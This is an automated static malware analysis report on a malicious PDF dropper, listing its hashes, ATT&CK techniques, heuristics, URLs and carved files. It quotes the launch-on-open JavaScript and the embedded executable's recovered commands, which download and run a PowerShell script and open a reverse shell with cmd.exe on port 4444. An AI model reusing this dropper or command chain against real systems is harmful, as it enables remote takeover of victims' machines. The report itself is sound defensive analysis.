Malicious PDF — malware analysis report

Static analysis result for SHA-256 1ddc197429d4cc6a…

MALICIOUS

PDF

458.3 KB Authoring application: PyPDF2 First seen: 2026-06-05
MD5: b0723bc54726f2ad11c1d76c1ab29fbb SHA-1: 46cc5ac08ed8269fd13e853815d054bae615c0d5 SHA-256: 1ddc197429d4cc6afd688c9eb56dc36817239bb2f0f426f0f9a688560b3a74ff
272 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The PDF contains JavaScript that utilizes the `exportDataObject` and `nLaunch` functions to automatically execute an embedded Windows executable file named 'page.html' upon opening. This executable is Base64 encoded within the PDF. The embedded URL 'http://aa.ogepscmaa/isjur/../qeymnj' is also suspicious and may be related to the payload delivery or C2 infrastructure.

Machine Learning

  • Nyx PDF Classifier malicious score 0.7380

Heuristics 10

  • Base64-encoded Windows executable payload in PDF critical PDF_BASE64_PE_PAYLOAD
    PDF text contains a long base64 blob that decodes to a verified Windows PE executable. This catches payloads hidden after EOF, inside comments, or in plain text outside normal PDF streams.
  • Suspicious extracted artifact critical EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • exportDataObject + nLaunch — embedded-file launch-on-open dropper critical PDF_JS_EXPORT_LAUNCH_DROPPER
    PDF JavaScript calls exportDataObject() with nLaunch set, which extracts the document's embedded file and launches it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • External URI low PDF_URI
    PDF contains an external URL action
  • Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js Referenced by PDF JavaScript
    • http://aa.ogepscmaa/isjur/../qeymnjReferenced by PDF JavaScript
    • http://www.ascendercorp.com/In PDF document text
    • http://www.ascendercorp.com/typedesigners.htmlIn PDF document text
    • http://www.monotype.comMonotypeIn PDF document text
    • https://get.adobe.com/flashplayer/Referenced by PDF JavaScript
    • https://wwwimages2.adobe.com/www.adobe.com/content/dam/acom/en/legal/licenses-terms/pdf/PlatformClients_PC_WWEULA-en_US-20150407_1357.pdfPDF link annotation
    • https://tinyurl.com/y88r9epkIn PDF document text
    • http://typekit.com/eulas/000000000000000000014f51In PDF document text
    • https://fedoraproject.org/wiki/Licensing/LiberationFontLicenseIn PDF document text
    • http://typekit.com/eulas/000000000000000000014f4fIn PDF document text
    • http://www.monotype.com/html/mtname/ms_arial.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlIn PDF document text

Extracted artifacts 9

Files carved from inside the sample during analysis.

FilenameKindSourceSize
page.html pdf-embedded-file PDF EmbeddedFile object 46 at offset 0x1473A 384474 bytes
SHA-256: f84ea2d50dd9b36852d2abaa31d40b0440d80649b488c70dafe74d79e4c70113
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0x9C7 58 bytes
SHA-256: 264b30b19988d0d66012af09cd2442e808d747d3fb6c4de44b81438b9bac75e3
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "page.html", nLaunch: 2 });
javascript_obj0004_001.js pdf-javascript-stream PDF /JS object 4 at offset 0x9C7 56 bytes
SHA-256: 7138f87bffcf0462164747b9bc1008c764542af7db17de522dde7b23c4bae8f7
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "page.html", nLaunch: 2 }
base64_pdf_pe_00014944.exe embedded-pe PDF raw base64 PE payload at offset 0x14944 287921 bytes
SHA-256: 886356a3e5fbc14383c1832ab0691aff98951fd37f2451810e137ab3a65c21e3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=base64_pdf_pe_00014944.exe; kind=embedded-pe Static shellcode analysis recovered URL(s): https://tinyurl.com/y88r9epk Static shellcode analysis recovered command string(s): cmd.exe /c mkdir c:\temp 2> NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= ^[Net.SecurityProtocolType^]::Tls12 > c:\temp\b.ps1 & echo (wget 'https://tinyu, cmd.exe /c powershell -Execut, cmd.exe /c powershell -ExecutionPolicy ByPass -File c:\temp\b.ps1 & START /MIN c:\temp\a.exe 192.168.0.104 4444 -e cmd.exe -d & exit
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x9C7 115 bytes
SHA-256: 4585fe1d8b50d37587f6a44a0c0fcedebafab044930973664af49854a3626369
Preview script
First 1,000 lines of the extracted script
this.exportDataObject({ cName: "page.html", nLaunch: 2 });
this.exportDataObject({ cName: "page.html", nLaunch: 2 }
font_00_sfnt_off000093e4.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x93E4 8344 bytes
SHA-256: 26f4a541ae01668596e6f0ecab6a4ec5af8e0430c526dd47363b686183eb1a36
font_01_sfnt_off0000aaff.bin pdf-font-stream PDF embedded font (sfnt) at offset 0xAAFF 21532 bytes
SHA-256: 5091de8b5a8651ee3354927cb3e58ac938a47a05778b1c5b3dcda2384521acca
font_02_sfnt_off0000e440.bin pdf-font-stream PDF embedded font (sfnt) at offset 0xE440 13036 bytes
SHA-256: 63cf60a9e10bbfe3933cc8f3af44b00485e40612cfca4f232e82d5bbf3cb122d
font_03_sfnt_off00010568.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x10568 34336 bytes
SHA-256: 434eb42b71a8798cb4ba10d418932446b08869be155f9587626055d9cb3de354

Open this report in the interactive analyzer, or submit your own file for analysis.